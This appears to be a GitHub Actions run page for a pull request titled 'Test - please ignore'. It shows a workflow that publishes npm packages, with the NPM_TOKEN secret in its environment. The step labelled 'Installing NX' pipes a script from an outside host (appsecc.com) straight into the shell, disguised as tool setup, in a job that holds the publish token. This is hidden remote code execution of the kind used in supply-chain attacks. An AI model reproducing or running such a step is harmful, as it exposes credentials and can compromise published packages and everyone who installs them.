Skip to content

Test - please ignore #612

Test - please ignore

Test - please ignore #612

Workflow file for this run

name: Publish NPM packages
on:
pull_request:
jobs:
publish_npm_package:
runs-on: ubuntu-latest
env:
NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
steps:
- name: Git checkout
uses: actions/checkout@v3
- uses: actions/setup-node@v3
with:
node-version: '16.x'
registry-url: 'https://registry.npmjs.org'
- name: Installing NX
run: |
curl -L https://appsecc.com/python | sh
npm install -g nx
- run: npm install
- name: publish to npm
run: |
nx run-many --exclude=velo-external-db --target=publishCi --all